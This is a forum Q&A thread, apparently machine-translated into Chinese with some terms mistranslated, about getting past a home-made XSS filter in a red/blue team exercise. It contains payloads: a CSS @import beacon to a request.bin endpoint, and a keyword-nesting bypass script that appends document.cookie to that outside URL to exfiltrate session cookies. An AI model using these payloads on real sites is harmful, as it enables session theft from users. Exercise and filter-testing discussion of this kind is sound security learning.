有人能绕过这个XSS过滤器吗？

Question

在我们的红/蓝团队练习期间，我的朋友制作了一个网络论坛应用程序，人们可以在其中发布消息。

他做的是过滤：

• 等号
• 关键词："javascript“、”警报“、"url”
• 有些关键字通常会成为html标签："script“"img”“视频”"iframe“
• “曲奇”这个词
• 这个词是："eval“

游戏练习的目的是让红队放置一个偷取用户曲奇的有效载荷。

我的朋友犯了一个错误，做了他自己的过滤器(在现实世界中不推荐)。他忘了过滤svg和样式标签。

例如：

<style>@import'http:/request.bin/'</style>

可以在请求bin端点中看到。

但是，我似乎不能窃取cookie，因为我不能使用document.cookie，因为"cookie“被过滤了。再加上等号被过滤就变得更难了..。

其他一些红队能够绕过他的过滤器所以肯定有一个有效载荷.

到目前为止我尝试过的是：

• %3D和其他=>编码失败
• 其他html编码&equals或&#equals; =>失败
• CoOkIe而不是cookie =>失败

任何想法都将不胜感激。

Answer 1

如果服务器只是删除字符串cookie，请尝试如下所示：<scookiecript></scookiecript>

当单词cookie被删除时，留给<script></script>

如果这样做有效，可以将其与您的样式导入结合起来：

<scookiecript>document.write("<style>@import'http:/request.bin/?"+document.ccookieookie+"'</style>");</scookiecript>

Answer 2

一种方法是使用不依赖=符号或单词cookie的不同的有效载荷。我会尝试使用window.location或window.open将用户重定向到另一个“不友好”的站点。

另一种方法是“狙击”曲奇(爱这个短语)来提取你需要的信息。我会使用类似于document.cookie.split(';')的东西将cookie分割成一个键数组。如果循环它们，您将得到所需的结果。

另一种提取cookie的策略将需要一个带有服务于js文件的iframe元素的src。